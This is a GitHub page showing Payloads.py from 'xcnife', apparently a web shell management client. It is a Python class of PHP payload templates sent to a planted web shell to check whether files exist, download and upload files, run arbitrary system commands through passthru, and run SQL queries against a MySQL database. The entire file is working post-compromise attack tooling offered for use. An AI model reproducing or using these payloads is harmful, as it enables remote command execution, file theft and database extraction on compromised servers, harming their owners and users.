xcnife/Payloads.py at master · runshell/xcnife · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
#author:xbillow

class Payloads:

    fileExists='''
    echo('*-*-*-*-*-*-*-*-*-*');
    if(!file_exists('{}'))
        echo "false";
    else
        echo "true";
    echo('*-*-*-*-*-*-*-*-*-*');
    exit();
    '''
    fileDownload='''
    echo('*-*-*-*-*-*-*-*-*-*');
    echo base64_encode(file_get_contents('{}'));
    echo('*-*-*-*-*-*-*-*-*-*');
    exit();
    '''
    fileUpload='''
    file_put_contents('{path}',base64_decode(str_replace(' ',chr(43),'{content}')));
    echo('*-*-*-*-*-*-*-*-*-*');
    echo 'OK';
    echo('*-*-*-*-*-*-*-*-*-*');
    exit();
    '''
    syscmd='''echo('*-*-*-*-*-*-*-*-*-*');passthru('{}');echo('*-*-*-*-*-*-*-*-*-*');exit();'''

    sqlExec='''
    echo('*-*-*-*-*-*-*-*-*-*');
    $conn = mysqli_connect("{host}","{user}","{passwd}","{db}",{port});
    if(!$conn) echo("[-]Error:Can't connect the database.");
    $query = "{sql}";
    $result = mysqli_query($conn,$query);
    if($row = mysqli_fetch_array($result,MYSQLI_ASSOC))
    {{{{{{{{
        foreach($row as $key=>$value)
            echo $key.",";
        echo "\\n";
        foreach($row as $key=>$value)
            echo $value.",";
        echo "\\n";
    }}}}}}}}
    while($row = mysqli_fetch_array($result,MYSQLI_ASSOC))
    {{{{{{{{
        foreach($row as $key=>$value)
            echo $value.",";
        echo "\\n";
    }}}}}}}}
    echo('*-*-*-*-*-*-*-*-*-*');
    exit();
    '''